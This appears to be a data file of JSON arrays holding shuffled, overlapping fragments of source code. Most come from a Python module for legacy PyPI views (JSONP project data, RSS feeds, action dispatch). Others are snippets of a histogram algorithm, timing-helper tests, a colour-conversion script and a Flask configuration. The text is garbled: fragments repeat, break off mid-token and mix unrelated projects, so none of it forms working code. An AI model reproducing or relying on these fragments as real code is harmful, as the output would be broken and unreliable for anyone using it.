"the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions:",
"to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response",
"elif version not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc",
"import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers",
"new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in",
"raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest version versions",
"NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for from warehouse.http import",
"extra crap if necessary if callback: data = '/**/ %s(%s);' % (callback, data)",
"mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name %r' %",
"it in any way, it simply registers it with the legacy routing mapping.",
"render the index, or at least we redirect to where it # moved",
"in compliance with the License. # You may obtain a copy of the",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases:",
":action style dispatch. Most of the dispatch in legacy PyPI was implemented using",
"url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\",",
"doesn't actually decorate the function or alter it in any way, it simply",
"simply registers it with the legacy routing mapping. \"\"\" if name in _action_methods:",
"@cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates as",
"See the License for the specific language governing permissions and # limitations under",
"it with the legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt",
"where it # moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, )",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"for this project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does",
"feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external",
"= app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to _external when",
"days' new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import",
"= 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request):",
"import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse",
"to re-register name %r' % (name, )) def deco(fn): _action_methods[name] = fn return",
"werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for from",
"(name, )) def deco(fn): _action_methods[name] = fn return fn return deco def pypi(app,",
"version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site,",
"too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last",
"re-register name %r' % (name, )) def deco(fn): _action_methods[name] = fn return fn",
"'/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition']",
"_action_methods: return _action_methods[action](app, request) # No :action means we render the index, or",
"%s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] =",
"render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register",
"= time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request,",
"callback is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid",
"does not exist\".format(project_name)) # we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name'])",
"dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No",
"NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict(",
"parameter in the GET or POST arguments. This doesn't actually decorate the function",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response",
"app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' #",
"url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra crap",
"in releases: # TODO update _force_external to _external when Flask-ification is done url",
"urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] =",
"to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url))",
"release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype",
"project_name, version=None): # fail early if callback is invalid callback = request.args.get('callback') if",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for",
"return deco def pypi(app, request): # check for the legacy :action-style dispatch action",
"legacy :action style dispatch. Most of the dispatch in legacy PyPI was implemented",
"a legacy :action style dispatch. Most of the dispatch in legacy PyPI was",
"for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write",
"if version is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version",
"urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra",
"TODO: throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss",
"for the legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods: return",
"no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version),",
"invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback",
"write the JSONP extra crap if necessary if callback: data = '/**/ %s(%s);'",
"@fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates as an RSS",
"release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'],",
"response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype =",
"from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {}",
"\"\"\"Dump the last N days' updates as an RSS feed. \"\"\" releases =",
"request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO:",
"def pypi(app, request): # check for the legacy :action-style dispatch action = request.args.get(':action')",
"json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary if callback: data",
"updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a",
"the specific language governing permissions and # limitations under the License. import json",
"in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in",
"has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'],",
"werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from",
"Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response =",
"varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if callback is",
"releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified",
"Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss",
"= dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url",
"done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app,",
"if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version",
"warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def",
"'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump",
"RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update",
"PyPI was implemented using a :action parameter in the GET or POST arguments.",
"url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls: url['upload_time']",
"rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), )",
"dispatch in legacy PyPI was implemented using a :action parameter in the GET",
"url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time()))",
"release, urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data =",
":action means we render the index, or at least we redirect to where",
":action-style dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) #",
"raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not in versions:",
"releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to _external",
"%r' % (name, )) def deco(fn): _action_methods[name] = fn return fn return deco",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None):",
"dispatch. Most of the dispatch in legacy PyPI was implemented using a :action",
"or alter it in any way, it simply registers it with the legacy",
"in _action_methods: return _action_methods[action](app, request) # No :action means we render the index,",
"request): # check for the legacy :action-style dispatch action = request.args.get(':action') if action",
"import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for",
"register(name): \"\"\"Register a handler for a legacy :action style dispatch. Most of the",
"project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name)) #"
] |
[
"for j in range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j",
"= int(input()) h = list(map(int, input().split())) ans = 0 for i in range(n):",
"= 0 for i in range(n): min_height = h[i] for j in range(i,",
"n = int(input()) h = list(map(int, input().split())) ans = 0 for i in",
"min(min_height, h[j]) ans = max(ans, (j - i + 1) * min_height) print(ans)",
"in range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j - i",
"min_height = min(min_height, h[j]) ans = max(ans, (j - i + 1) *",
"= list(map(int, input().split())) ans = 0 for i in range(n): min_height = h[i]",
"in range(n): min_height = h[i] for j in range(i, n): min_height = min(min_height,",
"= h[i] for j in range(i, n): min_height = min(min_height, h[j]) ans =",
"input().split())) ans = 0 for i in range(n): min_height = h[i] for j",
"min_height = h[i] for j in range(i, n): min_height = min(min_height, h[j]) ans",
"range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j - i +",
"i in range(n): min_height = h[i] for j in range(i, n): min_height =",
"= min(min_height, h[j]) ans = max(ans, (j - i + 1) * min_height)",
"h = list(map(int, input().split())) ans = 0 for i in range(n): min_height =",
"list(map(int, input().split())) ans = 0 for i in range(n): min_height = h[i] for",
"n): min_height = min(min_height, h[j]) ans = max(ans, (j - i + 1)",
"j in range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j -",
"h[i] for j in range(i, n): min_height = min(min_height, h[j]) ans = max(ans,",
"ans = 0 for i in range(n): min_height = h[i] for j in",
"range(n): min_height = h[i] for j in range(i, n): min_height = min(min_height, h[j])",
"for i in range(n): min_height = h[i] for j in range(i, n): min_height",
"int(input()) h = list(map(int, input().split())) ans = 0 for i in range(n): min_height",
"0 for i in range(n): min_height = h[i] for j in range(i, n):",
"<reponame>cnsteven/online-judge n = int(input()) h = list(map(int, input().split())) ans = 0 for i"
] |
[
"drink price list prices = {coke: 2, beer: 2.5, water: 0, juice: 2}",
"price list prices = {coke: 2, beer: 2.5, water: 0, juice: 2} print(price('beer'))",
"# drink price list prices = {coke: 2, beer: 2.5, water: 0, juice:"
] |
[
"def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1})",
"-*- import unittest from time import sleep import numpy as np from bigo_test.assertions.helpers",
"execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if",
"np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func)",
"numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint:",
"x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1,",
"pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers,",
"from time import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def",
"times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func",
"1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def",
"execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase):",
"func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2,",
"np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n)",
"times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]),",
"= execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1,",
"class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x:",
"options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)",
"def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\":",
"import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): #",
"x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]),",
"coding: utf-8 -*- import unittest from time import sleep import numpy as np",
"decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\":",
"execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1]))",
"import unittest from time import sleep import numpy as np from bigo_test.assertions.helpers import",
"\"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func =",
"test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers,",
"times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers,",
"options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__",
"= execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func =",
"\"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__ == \"__main__\":",
"# -*- coding: utf-8 -*- import unittest from time import sleep import numpy",
"as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument",
"test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times,",
"np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers,",
"np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func,",
"= test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1,",
"1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times =",
"np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers,",
"func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda",
"from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return",
"TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x,",
"numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1,",
"= execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)",
"np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times",
"lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times,",
"import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class",
"1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__ == \"__main__\": unittest.main()",
"utf-8 -*- import unittest from time import sleep import numpy as np from",
"numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self):",
"func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func =",
"np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\":",
"np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times",
"func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]),",
"bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func",
"2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1)",
"func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\":",
"time import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n):",
"1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func",
"test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1,",
"= test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)",
"unittest from time import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer",
"2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__ ==",
"def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func",
"1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times =",
"numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2})",
"np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers,",
"test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self):",
"def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times,",
"\"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self):",
"-*- coding: utf-8 -*- import unittest from time import sleep import numpy as",
"import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def",
"1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2,",
"1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1,",
"decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1]))",
"execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1)",
"test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1,",
"<reponame>nvn-nil/bigo_test # -*- coding: utf-8 -*- import unittest from time import sleep import",
"return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func,",
"test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\":",
"def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def",
"= test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2]))",
"# pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1)",
"sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times =",
"test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def",
"sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a):",
"disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times"
] |
[
"(int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g': g, 'b': b})",
"for i in range(3)) return (color, {'r': r, 'g': g, 'b': b}) d",
"in range(3)) return (color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color)",
"return (color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code,",
"config import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3))",
"import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return",
"color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g':",
"r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code, color in COLORS)",
"COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color,",
"range(3)) return (color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for",
"'g': g, 'b': b}) d = dict(to_color(code,color) for code, color in COLORS) import",
"= (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g': g, 'b':",
"from config import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in",
"{'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code, color in",
"'b': b}) d = dict(to_color(code,color) for code, color in COLORS) import json print(json.dumps(d,ensure_ascii=False))",
"g, 'b': b}) d = dict(to_color(code,color) for code, color in COLORS) import json",
"<gh_stars>0 from config import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i",
"def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r':",
"(color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code, color",
"to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r,",
"r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g': g,",
"i in range(3)) return (color, {'r': r, 'g': g, 'b': b}) d ="
] |
[
"True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\")",
"CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\")",
"dotenv import load_dotenv from os import environ, path from pathlib import Path load_dotenv(verbose=True)",
"= environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\") SQLALCHEMY_TRACK_MODIFICATIONS",
"SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if",
"path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID",
"dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY =",
"environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL",
